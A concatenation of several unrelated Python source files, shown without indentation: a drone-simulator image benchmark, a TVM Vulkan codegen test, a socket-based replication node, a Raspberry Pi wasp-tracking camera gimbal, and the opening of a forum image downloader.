drone_name = "drone_1",
viz_traj = False,
viz_traj_color_rgba=[1.0, 1.0, 0.0, 1.0],
viz_image_cv2 = False):
super().__init__(drone_name=drone_name, viz_traj=viz_traj, viz_image_cv2=viz_image_cv2)
self.image_benchmark_num_images = 0
self.image_benchmark_total_time = 0.0
self.image_callback_thread = None
if img_benchmark_type == "simGetImage":
self.image_callback_thread = threading.Thread(target=self.repeat_timer_img, args=(self.image_callback_benchmark_simGetImage, 0.05))
if img_benchmark_type == "simGetImages":
self.image_callback_thread = threading.Thread(target=self.repeat_timer_img, args=(self.image_callback_benchmark_simGetImages, 0.05))
self.is_image_thread_active = False
def start_img_benchmark_thread(self):
if not self.is_image_thread_active:
self.is_image_thread_active = True
self.image_callback_thread.start()
print("Started img image_callback thread")
def stop_img_benchmark_thread(self):
if self.is_image_thread_active:
self.is_image_thread_active = False
self.image_callback_thread.join()
print("Stopped image callback thread.")
def repeat_timer_img(self, task, period):
while self.is_image_thread_active:
task()
time.sleep(period)
def print_benchmark_results(self):
avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))
print(self.level_name + ": {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))
def image_callback_benchmark_simGetImage(self):
self.image_benchmark_num_images += 1
iter_start_time = time.time()
response = self.airsim_client_images.simGetImage("fpv_cam", airsim.ImageType.Scene)
img_rgb = cv2.imdecode(airsim.string_to_uint8_array(response), cv2.IMREAD_UNCHANGED)
self.image_benchmark_total_time += time.time() - iter_start_time
avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))
print(self.level_name + ": {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))
# uncomment following lines to viz image
# if self.viz_image_cv2:
# cv2.imshow("img_rgb", img_rgb_1d_new)
# cv2.waitKey(1)
def image_callback_benchmark_simGetImages(self):
self.image_benchmark_num_images += 1
iter_start_time = time.time()
request = [airsim.ImageRequest("fpv_cam", airsim.ImageType.Scene, False, False)]
response = self.airsim_client_images.simGetImages(request)
img_rgb_1d = np.frombuffer(response[0].image_data_uint8, dtype=np.uint8)
img_rgb = img_rgb_1d.reshape(response[0].height, response[0].width, 3)
self.image_benchmark_total_time += time.time() - iter_start_time
avg_fps = 1.0 / ((self.image_benchmark_total_time) / float(self.image_benchmark_num_images))
print(self.level_name + ": {} avg_fps for {} num of images".format(avg_fps, self.image_benchmark_num_images))
# uncomment following lines to viz image
# if self.viz_image_cv2:
# cv2.imshow("img_rgb", img_rgb_1d_new)
# cv2.waitKey(1)
def main(args):
# ensure you have generated the neurips planning settings file by running python generate_settings_file.py
baseline_racer = BaselineRacerImageBenchmarker(img_benchmark_type=args.img_benchmark_type, \
drone_name="drone_1", \
viz_traj=args.viz_traj, \
viz_traj_color_rgba=[1.0, 1.0, 0.0, 1.0], \
viz_image_cv2=args.viz_image_cv2)
baseline_racer.load_level(args.level_name)
if args.level_name == "Qualifier_Tier_1":
args.race_tier = 1
if args.level_name == "Qualifier_Tier_2":
args.race_tier = 2
if args.level_name == "Qualifier_Tier_3":
args.race_tier = 3
baseline_racer.start_race(args.race_tier)
baseline_racer.initialize_drone()
baseline_racer.takeoff_with_moveOnSpline()
baseline_racer.get_ground_truth_gate_poses()
baseline_racer.start_img_benchmark_thread()
baseline_racer.fly_through_all_gates_at_once_with_moveOnSpline().join()
baseline_racer.stop_img_benchmark_thread()
baseline_racer.print_benchmark_results()
if __name__ == "__main__":
parser = ArgumentParser()
parser.add_argument('--level_name', type=str, choices=["Soccer_Field_Easy", "Soccer_Field_Medium", "ZhangJiaJie_Medium", "Building99_Hard",
"Qualifier_Tier_1", "Qualifier_Tier_2", "Qualifier_Tier_3"], default="ZhangJiaJie_Medium")
parser.add_argument('--enable_viz_traj', dest='viz_traj', action='store_true', default=False)
parser.add_argument('--img_benchmark_type', type=str, choices=["simGetImage", "simGetImages"], default="simGetImages")
parser.add_argument('--enable_viz_image_cv2', dest='viz_image_cv2', action='store_true', default=False)
parser.add_argument('--race_tier', type=int, choices=[1,2,3], default=1)
args = parser.parse_args()
main(args)
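# Example invocation (a sketch; assumes the AirSim NeurIPS binary and the settings file
# produced by generate_settings_file.py are already in place):
#   python baseline_racer_image_benchmarker.py --level_name Soccer_Field_Easy --img_benchmark_type simGetImages --race_tier 1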
|
test_codegen_vulkan.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import tvm
import re
import numpy as np
def test_vector_comparison():
if not tvm.runtime.enabled("vulkan"):
print("Skipping due to no Vulkan module")
return
target = 'vulkan'
def check_correct_assembly(dtype):
n = (1024,)
A = tvm.placeholder(n, dtype=dtype, name='A')
B = tvm.compute(
A.shape,
lambda i: tvm.tir.Select(
A[i] >= 0, A[i] + tvm.const(1, dtype),
tvm.const(0, dtype)), name='B')
s = tvm.create_schedule(B.op)
(bx, tx) = s[B].split(s[B].op.axis[0], factor=128)
(tx, vx) = s[B].split(tx, factor=4)
s[B].bind(bx, tvm.thread_axis("blockIdx.x"))
s[B].bind(tx, tvm.thread_axis("threadIdx.x"))
s[B].vectorize(vx)
f = tvm.build(s, [A, B], target)
# Verify we generate the boolx4 type declaration and the OpSelect
# v4{float,half,int} instruction
assembly = f.imported_modules[0].get_source()
matches = re.findall("%v4bool = OpTypeVector %bool 4", assembly)
assert len(matches) == 1
matches = re.findall("OpSelect %v4.*", assembly)
assert len(matches) == 1
check_correct_assembly('float32')
check_correct_assembly('int32')
check_correct_assembly('float16')
tx = tvm.thread_axis("threadIdx.x")
bx = tvm.thread_axis("blockIdx.x")
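# tx and bx are created once at module scope so the remaining tests can reuse the same
# thread/block axis handles when binding their schedules.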
def test_vulkan_copy():
def check_vulkan(dtype, n):
if not tvm.vulkan(0).exist or not tvm.runtime.enabled("vulkan"):
print("skip because vulkan is not enabled..")
return
A = tvm.placeholder((n,), name='A', dtype=dtype)
ctx = tvm.vulkan(0)
a_np = np.random.uniform(size=(n,)).astype(A.dtype)
a = tvm.nd.empty((n,), A.dtype, ctx).copyfrom(a_np)
b_np = a.asnumpy()
tvm.testing.assert_allclose(a_np, b_np)
tvm.testing.assert_allclose(a_np, a.asnumpy())
for _ in range(100):
dtype = np.random.choice(["float32", "float16", "int8", "int32"])
logN = np.random.randint(1, 15)
perturb = np.random.uniform(low=0.5, high=1.5)
check_vulkan(dtype, int(perturb * (2 ** logN)))
def test_vulkan_vectorize_add():
num_thread = 8
def check_vulkan(dtype, n, lanes):
if not tvm.vulkan(0).exist or not tvm.runtime.enabled("vulkan"):
print("skip because vulkan is not enabled..")
return
A = tvm.placeholder((n,), name='A', dtype="%sx%d" % (dtype, lanes))
B = tvm.compute((n,), lambda i: A[i]+tvm.const(1, A.dtype), name='B')
s = tvm.create_schedule(B.op)
xo, xi = s[B].split(B.op.axis[0], factor=num_thread)
s[B].bind(xo, bx)
s[B].bind(xi, tx)
fun = tvm.build(s, [A, B], "vulkan")
ctx = tvm.vulkan(0)
a = tvm.nd.empty((n,), A.dtype, ctx).copyfrom(
np.random.uniform(size=(n, lanes)))
c = tvm.nd.empty((n,), B.dtype, ctx)
fun(a, c)
tvm.testing.assert_allclose(c.asnumpy(), a.asnumpy() + 1)
check_vulkan("float32", 64, 2)
check_vulkan("float16", 64, 2)
def test_vulkan_stress():
"""
Launch a randomized test with multiple kernels per stream, multiple uses of
kernels per stream, over multiple threads.
"""
import random
import threading
n = 1024
num_thread = 64
def run_stress():
def worker():
if not tvm.vulkan(0).exist or not tvm.runtime.enabled("vulkan"):
print("skip because vulkan is not enabled..")
return
A = tvm.placeholder((n,), name='A', dtype="float32")
B = tvm.placeholder((n,), name='B', dtype="float32")
functions = [
(lambda: tvm.compute((n,), lambda i: 2 * A[i] + 3 * B[i]),
lambda a, b: 2 * a + 3 * b),
(lambda: tvm.compute((n,), lambda i: A[i]+B[i]),
lambda a, b: a + b),
(lambda: tvm.compute((n,), lambda i: A[i]+2 * B[i]),
lambda a, b: a + 2 * b),
]
def build_f(f_ref):
(C_f, ref) = f_ref
C = C_f()
s = tvm.create_schedule(C.op)
xo, xi = s[C].split(C.op.axis[0], factor=num_thread)
s[C].bind(xo, bx)
s[C].bind(xi, tx)
fun = tvm.build(s, [A, B, C], "vulkan")
return (fun, ref)
fs = [build_f(random.choice(functions))
for _ in range(np.random.randint(low=1, high=10))]
ctx = tvm.vulkan(0)
a = tvm.nd.empty((n,), A.dtype, ctx).copyfrom(
np.random.uniform(size=(n,)))
b = tvm.nd.empty((n,), B.dtype, ctx).copyfrom(
np.random.uniform(size=(n,)))
cs = [tvm.nd.empty((n,), A.dtype, ctx) for _ in fs]
for ((f, _), c) in zip(fs, cs):
f(a, b, c)
for ((_, ref), c) in zip(fs, cs):
tvm.testing.assert_allclose(
c.asnumpy(), ref(a.asnumpy(), b.asnumpy()))
ts = [threading.Thread(target=worker)
for _ in range(np.random.randint(1, 10))]
for t in ts:
t.start()
for t in ts:
t.join()
run_stress()
if __name__ == "__main__":
test_vector_comparison()
test_vulkan_copy()
test_vulkan_vectorize_add()
test_vulkan_stress()
|
node_3.py
|
import socket
import multiprocessing as mp
import time
import json
node_id = 3
#stored_string = ""
nodes = [1,2,3,4,5]
manager = mp.Manager()
node_wise_write_update = manager.list([0]*5)
stored_string = manager.list([""])
node_status = [0,0,0,0,0]
leader_node_id = 0
start = time.time()
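# Port conventions used throughout this node:
#   50000 + node_id                    : start-up registration with the coordinator
#   10000 + node_id                    : client/coordinator-facing listener (server_connect)
#   ((leader_id+10)*1000) + node_id    : leader -> follower write replication
#   ((90+leader_id)*100) + node_id     : master-copy download for re-joining nodes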
def convert(string):
global node_status
node_status = list(string.split(" "))
for i in range(0, len(node_status)):
node_status[i] = int(node_status[i])
#print(node_status)
#return li
def get_master_copy_from_leader(leader_id, node_id):
if node_id>=4:
if leader_id>=4:
IP = '0.0.0.0'
else:
IP = '34.243.81.104'
if node_id<4:
if leader_id<4:
IP = '0.0.0.0'
else:
IP = '3.16.164.181'
print("Initiate master copy download...................................")
port = ((90+leader_id)*100) + node_id
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(3.0)
try:
client.connect((IP, port))
except socket.error as e:
print("Socket error: ", e)
return
send_download_request = 'request_master_copy'
client.send(send_download_request)
from_leader = client.recv(4096)
print(from_leader)
#node_status[node_id-1] = True
#node_age[node_id-1] = rcvd_mssg["age"]
client.close()
return from_leader
def read_from_file():
global stored_string
with open('persistent_storage.txt', 'r') as file:
data = file.read()
stored_string[0] = data
def node_start_up(node_id):
global leader_node_id
global stored_string
global node_status
IP= '34.243.81.104'
print("Node start up initiated...................................")
port = (50000) + node_id
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(3.0)
try:
client.connect((IP, port))
except socket.error as e:
print("Socket error: ", e)
return
send_download_request = 'ping_new_node'
client.send(send_download_request)
from_server = client.recv(4096)
print(from_server)
rcvd_mssg = json.loads(from_server)
leader_node_id = int(rcvd_mssg["leader_node_id"])
#node_status[node_id-1] = True
#node_age[node_id-1] = rcvd_mssg["age"]
convert(rcvd_mssg["node_status"])
if sum(node_status) == 0:
read_from_file()
print("Local copy updated at start-up from file: ", stored_string[0])
else:
stored_string[0] = get_master_copy_from_leader(leader_node_id, node_id)
if stored_string[0] is None or stored_string[0]=="blank":
stored_string[0] =''
print("New node's local copy updated to: ", stored_string[0])
client.close()
node_start_up(node_id)
def connect_with_followers(leader_id, node_id, value_to_be_written):
if node_id>=4:
if leader_id>=4:
IP = '0.0.0.0'
else:
IP = '3.16.164.181'
if node_id<4:
if leader_id<4:
IP = '0.0.0.0'
else:
IP = '34.243.81.104'
port = ((leader_id+10)*1000) + node_id
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.settimeout(3.0)
print('Leader connected with socket: ', port)
try:
client.connect((IP, port))
except socket.error as e:
print("Socket error: ", e)
node_wise_write_update[node_id-1]=0
return
message_to_followers = value_to_be_written
client.send(message_to_followers)
from_server = client.recv(4096)
client.close()
print(from_server)
#if int(from_server)==1:
if (from_server=="1"):
node_wise_write_update[node_id-1]=1
def initiate_multicast(value_to_be_written):
# pop up multiple processes
print('Multicast initiated...................................')
global nodes
global node_status
global leader_node_id
multi_cast_procs = []
for i in range(0,len(nodes)):
#print(' For i: ', i)
# connect to node only if it's active and the node is not the leader itself
print(' For i: ', i, ' Node status: ', node_status[i], ' node number: ', nodes[i])
if (node_status[i]==1 and nodes[i]!=leader_node_id):
p = mp.Process(target=connect_with_followers, args=(leader_node_id,nodes[i],value_to_be_written,))
multi_cast_procs.append(p)
p.start()
p.join()
#time.sleep(2)
time.sleep(2)
# check if all active nodes were updated with the latest write
write_transaction_fail_count = 0
for j in range(0,len(nodes)):
if write_transaction_fail_count>1:
return 0 # indicating failure
if j == (leader_node_id-1):
continue # skip for the leader itself
if (node_status[j]==1 and node_wise_write_update[j]==0):
write_transaction_fail_count = write_transaction_fail_count + 1
return 1
def listen_new_nodes_as_leader(leader_id, node_id):
# printing process id
#global stored_string
print("Acting as a leader for new nodes..............................")
port = ((90+leader_id)*100) + node_id
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
serv.bind(('0.0.0.0', port))
except socket.error as e:
skip_temp = 0
print('Listening to any new nodes at port : ', port)
serv.listen(5)
while True:
conn, addr = serv.accept()
from_new_node = ''
while True:
data = conn.recv(4096)
if not data: break
from_new_node += data
print('Received message from Node ', node_id, ' : ', from_new_node)
message_master_copy=stored_string[0]
if message_master_copy=='':
print("Yes blank message detected.. converted to None")
message_master_copy = "blank"
conn.send(message_master_copy)
conn.close()
print('Connection closed at leaders end....................................')
#print('sending from: ', port)
#def leader_broadcast():
def initiate_leader_to_new_node():
# pop up multiple processes
print('Initiate leader_to_new_node initiated...................................')
global nodes
global node_status
global leader_node_id
listen_new_node_procs = []
for i in range(0,len(nodes)):
# connect to node only if it's active and the node is not the leader itself
#if (node_status[i]==1 and nodes[i]!=leader_node_id):
if (nodes[i]!=leader_node_id):
p = mp.Process(target=listen_new_nodes_as_leader, args=(leader_node_id,nodes[i],))
listen_new_node_procs.append(p)
p.start()
#p.join()
def write_to_file():
global stored_string
text_file = open("persistent_storage.txt", "w")
text_file.write(stored_string[0])
text_file.close()
print("---------------- Written to File ----------------------")
def server_connect(node_id):
# printing process id
global node_status
global leader_node_id
global stored_string
global start
sole_replica_first_time = False
last_time_heard_from_cluster = time.time()
port = (10000) + node_id
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
serv.bind(('0.0.0.0', port))
except socket.error as e:
skip_temp = 0
print('Listening at: ', port)
serv.listen(5)
while True:
conn, addr = serv.accept()
from_client = ''
temp_variable = False
while True:
data = conn.recv(4096)
if not data: break
from_client += data
print(from_client)
rcvd_mssg = json.loads(from_client)
if rcvd_mssg["activity"]=="node_status_check":
print('Node status check received.....................................')
age = time.time() - start
response_message = '{"age":' + str(round(age,2)) + '}'
conn.send(response_message)
if rcvd_mssg["activity"]=="group_update":
print('Group update received...........................................')
#if rcvd_mssg["leader_node_id"]==node_id:
response_message = 'Group update received by Node ' + str(node_id)
conn.send(response_message)
##############################################################################################
this_time_heard = time.time()
print ("xxxxxxxxxxxxxxxxxxx ", this_time_heard-last_time_heard_from_cluster, " xxxxxxxxxxxx")
if (this_time_heard-last_time_heard_from_cluster)>40:
print("Yes more time taken")
start = time.time()
node_start_up(node_id)
last_time_heard_from_cluster = time.time()
##############################################################################################
# update local copy of leader_node_id
leader_node_id = int(rcvd_mssg["leader_node_id"])
# update local copy of node_status
convert(rcvd_mssg["node_status"])
print('updated local copy of node_status: ', node_status)
if sum(node_status)==1 and node_status[node_id-1]==1 and sole_replica_first_time==False:
######## print("xxxxxxxxxxxxxxxxxxx Written local copy to disk xxxxxxxxxxxxxxxxxxx")
sole_replica_first_time = True
write_to_file()
if sum(node_status)>1:
sole_replica_first_time=False
if rcvd_mssg["leader_node_id"]!=node_id:
# close connection as the next following function call exits the function
#conn.close()
#print('Connection closed at listeners end (listener to client)....................................')
# act as follower (listen to leader) (single process)
temp_variable = True
#listen_to_leader(leader_node_id, node_id)
#print("ignore me")
if rcvd_mssg["leader_node_id"]==node_id:
initiate_leader_to_new_node()
if rcvd_mssg["activity"]=="write_request":
print('Write request received...........................................')
# only possible when this node is leader
# update the local copy of the leader
stored_string[0] = stored_string[0] + rcvd_mssg["value_to_be_written"]
print('Leaders local copy updated to ........', stored_string[0])
# act as leader and send to all nodes (client function). Need to run multiple processes
result = initiate_multicast(rcvd_mssg["value_to_be_written"])
print("Write status update from all followers: ", result)
response_message = str(result)
conn.send(response_message)
if sum(node_status)==1 and node_status[node_id-1]==1:
######## print("xxxxxxxxxxxxxxxxxxx Written local copy to disk xxxxxxxxxxxxxxxxxxx")
write_to_file()
if rcvd_mssg["activity"]=="read_request":
# only possible when the node is the leader
response_message = stored_string[0]
conn.send(response_message)
#message = "I am node " + str(node_id) + 'alive since ' + str(age)
#if activity = write and leader = this node, then update array and run leader broadcast function
#if activity = write and leader = others, then run server function to listen to broadcasts and confirm back if updated array
conn.shutdown(1)
conn.close()
print('Connection closed at listeners end (listener to client)....................................')
if temp_variable==True:
print('temp variable is true.....')
p1 = mp.Process(target=listen_to_leader, args=(leader_node_id, node_id,))
p1.start()
#listen_to_leader(leader_node_id, node_id)
print('moving ahead........')
#print('sending from: ', port)
def listen_to_leader(leader_id, node_id):
# printing process id
#global stored_string
print("Acting as a follower to Node: ", leader_id, "..............................")
port = ((leader_id+10)*1000) + node_id
serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
serv.bind(('0.0.0.0', port))
except socket.error as e:
skip_temp = 0
print('Listening to the leader at port : ', port)
serv.listen(5)
while True:
conn, addr = serv.accept()
from_leader = ''
while True:
data = conn.recv(4096)
if not data: break
from_leader += data
print('Received message from Node ', leader_id, ' : ', from_leader)
stored_string[0] = stored_string[0] + from_leader
# just update local copy of the array (as a follower)
print('Local copy updated to ', stored_string[0])
#message = '{"age":' + str(round(age,2)) + '}'
#message = "received update at node: " + str(node_id)
message="1"
conn.send(message)
conn.close()
print('Connection closed at listeners end (listener to leader)....................................')
#print('sending from: ', port)
#def leader_broadcast():
#p1 = mp.Process(target=server_connect, args=(node_id,))
#p1.start()
server_connect(node_id)
|
gimbalWasp02.py
|
import cv2
import sys
import time
import numpy
import random
from multiprocessing import Process
from multiprocessing import Queue
from picamera.array import PiRGBArray
from picamera import PiCamera
from adafruit_servokit import ServoKit
kit = ServoKit(channels=8)
kit.servo[0].angle = 110 # y
kit.servo[1].angle = 90 # x
#hacked from:
#https://software.intel.com/articles/OpenVINO-Install-RaspberryPI
#https://opencv2-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html
#https://github.com/PINTO0309/MobileNet-SSD-RealSense/blob/master/SingleStickSSDwithUSBCamera_OpenVINO_NCS2.py
#https://raspberrypi.stackexchange.com/questions/87062/overhead-counter
#Les Wright Dec 24 2018
#modified to support picam 30 Dec 2018
#Robot code incorporated on 17 Jan 2019
count = 0
count2 = 0
def motion(xminQueue,xmaxQueue,yminQueue,ymaxQueue):
def left(stime):
nonlocal myXAngle  # reassign the angle tracked in the enclosing motion() scope
myXAngle = myXAngle -1
kit.servo[1].angle = myXAngle
sustain(stime)
def right(stime):
nonlocal myXAngle  # reassign the angle tracked in the enclosing motion() scope
myXAngle = myXAngle +1
kit.servo[1].angle = myXAngle
def sustain(stime):
time.sleep(stime)
stop()
def stop():
kit.servo[1].angle = 90
def hunt():
right(0.2)
stop()
stop()
start = time.time() #start a timer
myXAngle = 90
myYAngle = 110
while True:
if not xminQueue.empty():
xmin = xminQueue.get()
xmax = xmaxQueue.get()
#print(str(xmin)+' '+str(xmax))
midpointX = (xmin+xmax)/2
width = xmax-xmin
#print("W:"+str(width))
#stime = 1 # seconds
#sustain(stime)
#stime = abs(150-midpointX)/3000
#print(str(stime))
#align midpoint with middle of the frame
if midpointX < 140:
myXAngle = myXAngle +0.1
kit.servo[1].angle = myXAngle
if midpointX > 160:
myXAngle = myXAngle -0.1
kit.servo[1].angle = myXAngle
start = time.time() #reset the timer
if not yminQueue.empty():
ymin = yminQueue.get()
ymax = ymaxQueue.get()
#print(str(xmin)+' '+str(xmax))
midpointY = (ymin+ymax)/2
width = ymax-ymin
#print("M:"+str(midpointY))
#print("W:"+str(width))
#print("Mx: "+str(midpointX) + " My: " +str(midpointY) )
#stime = abs(150-midpointY)/3000
#sustain(stime)
#print(str(stime))
#align midpoint with middle of the frame
if midpointY < 140:
myYAngle = myYAngle -0.2
kit.servo[0].angle = myYAngle
if midpointY > 160:
myYAngle = myYAngle +0.2
kit.servo[0].angle = myYAngle
start = time.time() #reset the timer
if xminQueue.empty():
seconds = time.time()-start
if seconds > 0.8: #if we are empty for longer than 0.8 sec, we probably lost the target...
#print('Hunting...')
#hunt()
start = time.time() #reset the timer
# initialize the input queue (frames), output queue (out),
# and the list of actual detections returned by the child process
xminQueue = Queue(maxsize=1)
xmaxQueue = Queue(maxsize=1)
yminQueue = Queue(maxsize=1)
ymaxQueue = Queue(maxsize=1)
# construct a child process independent from our main process
print("[INFO] starting motion handling process...")
p2 = Process(target=motion, args=(xminQueue,xmaxQueue,yminQueue,ymaxQueue))
p2.daemon = True
p2.start()
labels_file = 'models/labels.txt'
with open(labels_file, 'r') as f:
labels = [x.strip() for x in f]
#print(labels)
# Note cv2.dnn.blobFromImage, the size is present in the XML files, we could write a preamble to go get that data,
# Then we don't have to explicitly set it!
# Load the model
net = cv2.dnn.readNet('models/wasp.xml', 'models/wasp.bin')
# Specify target device
net.setPreferableTarget(cv2.dnn.DNN_TARGET_MYRIAD)
#Misc vars
font = cv2.FONT_HERSHEY_SIMPLEX
frameWidth = 600
frameHeight = 600
framesPerSec = 24
##frameWidth = 640
##frameHeight = 480
##framesPerSec = 12
secPerFrame = 0.0
detections = 0.0
confThreshold = 0.5
#initialize the camera and grab a reference to the raw camera capture
#well this is interesting, we can closely match the input of the network!
#this 'seems' to have improved accuracy!
camera = PiCamera()
camera.resolution = (304, 304)
camera.framerate = 20
rawCapture = PiRGBArray(camera, size=(304, 304))
# allow the camera to warmup
time.sleep(0.1)
#print(labels)
#seconds4 = 0.000000001
#define the function that handles our processing thread
def classify_frame(net, inputQueue, outputQueue):
# keep looping
while True:
# check to see if there is a frame in our input queue
start4 = time.time()
if not inputQueue.empty():
# grab the frame from the input queue, resize it, and
# construct a blob from it
frame = inputQueue.get()
resframe = cv2.resize(frame, (300, 300))
blob = cv2.dnn.blobFromImage(frame, size=(300, 300), ddepth=cv2.CV_8U)
#net.setInput(blob)
#blob = cv2.dnn.blobFromImage(resframe, 0.007843, size=(300, 300),\
#mean=(127.5,127.5,127.5), swapRB=False, crop=False)
net.setInput(blob)
out = net.forward()
# write the detections to the output queue
outputQueue.put(out)
end4 = time.time()
seconds4 = end4-start4
print("\033[1;35;40m grab ..... blob from it delay seconds: "+str(seconds4))
#sys.stdout.write("\033[F")
# initialize the input queue (frames), output queue (out),
# and the list of actual detections returned by the child process
inputQueue = Queue(maxsize=1)
outputQueue = Queue(maxsize=1)
out = None
# construct a child process *independent* from our main process of
# execution
print("[INFO] starting inference process...")
p = Process(target=classify_frame, args=(net,inputQueue,outputQueue,))
p.daemon = True
p.start()
print("[INFO] starting capture...(loading model) .....")
print("")
#time the frame rate....
start = time.time()
frames = 0
#confidence = 0.00
for frame in camera.capture_continuous(rawCapture, format="rgb", use_video_port=True):
# Capture frame-by-frame
frame = frame.array
# if the input queue *is* empty, give the current frame to
# classify
if inputQueue.empty():
inputQueue.put(frame)
# if the output queue *is not* empty, grab the detections
if not outputQueue.empty():
out = outputQueue.get()
# check to see if 'out' is not empty
if out is not None:
# loop over the detections
# Draw detections on the frame
for detection in out.reshape(-1, 7):
confidence = float(detection[2])
obj_type = int(detection[1]-1)
xmin = int(detection[3] * frame.shape[1])
ymin = int(detection[4] * frame.shape[0])
xmax = int(detection[5] * frame.shape[1])
ymax = int(detection[6] * frame.shape[0])
#bottle = 4, person = 14 , dog = 11
#if obj_type == 1: #Our object (type filter disabled; all detections above the confidence threshold are used)
if confidence > confThreshold:
#bounding box
start2 = time.time()
cv2.rectangle(frame, (xmin, ymin), (xmax, ymax), color=(0, 255, 255))
#label
cv2.rectangle(frame, (xmin-1, ymin-1),\
(xmin+70, ymin-10), (0,255,255), -1)
#labeltext
cv2.putText(frame,labels[obj_type]+' '+str(round(confidence,2)),\
(xmin,ymin-2), font, 0.3,(0,0,0),1,cv2.LINE_AA)
detections += 1
end2 = time.time()
seconds2 = end2-start2
xmaxQueue.put(xmax)
xminQueue.put(xmin)
ymaxQueue.put(ymax)
yminQueue.put(ymin)
# Display the resulting frame
start3 = time.time()
cv2.putText(frame,'Threshold: '+str(round(confThreshold,1)), (10, 10), cv2.FONT_HERSHEY_SIMPLEX, 0.3,(0, 0, 0), 1, cv2.LINE_AA)
cv2.namedWindow('frame',cv2.WINDOW_NORMAL)
cv2.resizeWindow('frame',frameWidth,frameHeight)
cv2.imshow('frame',frame)
end3 = time.time()
seconds3 = end3-start3
frames+=1
#for num in range(10): #to iterate on the factors of the number
count = count +1
if count == 500: #to determine the first factor
end = time.time()
count2 = count2 +1
seconds = end-start
fps = frames/seconds
dts = detections/seconds
start = time.time() #start timer again
frames = 0
detections = 0
#print("Current confidence: "+ str(confidence))
if dts == 0:
print("\033[1;32;40m .... loading model ..... "+str(count2) +"/11" +"\033[0;37;40m")
sys.stdout.write("\033[F") # Cursor up one line
else:
i = 0
detections = 0.0001
print("\033[1;36;40m Frames Per Sec: "+str(fps))
print(" Detections Per Sec: "+str(dts))
print(" Draw rectangle and text delay seconds: "+str(seconds2))
print(" Display the resulting screen delay seconds: "+str(seconds3))
#sys.stdout.write("\033[F")
#sys.stdout.write("\033[F")
#sys.stdout.write("\033[F")
#sys.stdout.write("\033[F")
#print("Seconds: "+str(seconds))
#print("Detections: "+str(detections))
print("")
count = 0
# clear the stream in preparation for the next frame
rawCapture.truncate(0)
keyPress = cv2.waitKey(1)
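# Key handling: 113 is 'q' (quit); 82/84 are the codes cv2.waitKey reports for the
# Up/Down arrow keys here, used to raise/lower the confidence threshold by 0.1.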
if keyPress == 113:
break
if keyPress == 82:
confThreshold += 0.1
if keyPress == 84:
confThreshold -= 0.1
if confThreshold >1:
confThreshold = 1
if confThreshold <0:
confThreshold = 0
end = time.time()
seconds = end-start
fps = frames/seconds
print("Avg Frames Per Sec: "+str(fps))
dts = detections/seconds
print("Avg detections Per Sec: "+str(dts))
cv2.destroyAllWindows()
# No GPIO pins are used in this script, so there is no GPIO cleanup to do on exit.
|
dlXossip.py
|
#######################################################################################################################
# Image Downloader
#
#This code is to get links to images from image boards and download it responsibly
#
# Input variables:
#-->Forum Thread number
#-->Thread Start Page Number
#-->Thread End Page number
#-->Parallel download count
#-->File Save Location
#-->File sequential numbering or from source
#-->File prefix
#-->File Min Size
#-> verbose mode
#
#To add: verbose mode, post download deletion of poor images.
#######################################################################################################################
########Import libraries
from bs4 import BeautifulSoup
import re
import requests
import threading
import time
from urllib.parse import urlparse
import urllib.parse
import os
import argparse
from slugify import slugify
#########Input Variables#########
xossipThread = 1487535 #1086810
startPage = 6
endPage =10
threadCount = 10
saveLocation = "C:/Images/thrd1487535/"
fileprefix = "parser_"
useOriginalName = True
minKB = 5
######## Argument parser for command line
parser = argparse.ArgumentParser(description='This is a program to download images from Xossip.com threads.')
parser.add_argument( "Thread", metavar='ThreadId',
type=int,help='The thread id can be found in the URL. https://xossip.com/showthread.php?t=>1234567<')
parser.add_argument('startPage',metavar="Start-Page",type=int,help="Start downloads from Page Number")
parser.add_argument('endPage',metavar="End-Page",type=int,help="Download till Page Number")
parser.add_argument("-f", "--file",type=str, dest="saveLocation",help="Write images to FOLDER", metavar="FOLDER",required=True)
args = parser.parse_args()
xossipThread = args.Thread
startPage = args.startPage
endPage = args.endPage
saveLocation = args.saveLocation
#########This bit of code looks at the webpage and gets all the image urls#########
imageURL = []
for pageno in range(startPage,endPage+1):
print("\rScanning Page "+str(pageno)+"...",end=" ")
####Edit here for other websites
source = requests.get('https://www.xossip.com/showthread.php?t='+str(xossipThread)+'&page='+str(pageno))
soup = BeautifulSoup(source.text,'lxml')
for divtag in soup.find_all("div",id = re.compile("post_message_*")):
for imgtag in divtag.find_all('img',border ="0",alt="",src = re.compile("http*")):
#print(imgtag['src'])
imageURL.append(imgtag['src'])
######### This bit of code keeps only externally hosted (non-xossip) image URLs #########
print("\nFound "+str(len(imageURL))+" images. Filtering...")
#print(imageURL)
imageURLfiltered = []
for domain in imageURL:
#print(urlparse(domain).netloc)
if "xossip" not in urlparse(domain).netloc:
imageURLfiltered.append(domain)
del imageURL
print("Filtered "+str(len(imageURLfiltered))+" image. Starting download...")
#print(imageURLfiltered)
#########This code downloads multiple images in parallel#########
if not os.path.exists(saveLocation):
os.makedirs(saveLocation)
def download(link, filelocation,minKB):
minSize = minKB*1000 #min file size to download in Bytes 5000 = 5KB
flag = True
r = requests.get(link, stream=True)
######Checks before download
#check for min file size if content length is reported by server
if r.headers.get("content-length"):
if int(r.headers.get("content-length"))<minSize:
flag = False
#Check for file datatype
if "image" not in r.headers["content-type"]:
flag = False
#Check for http errors
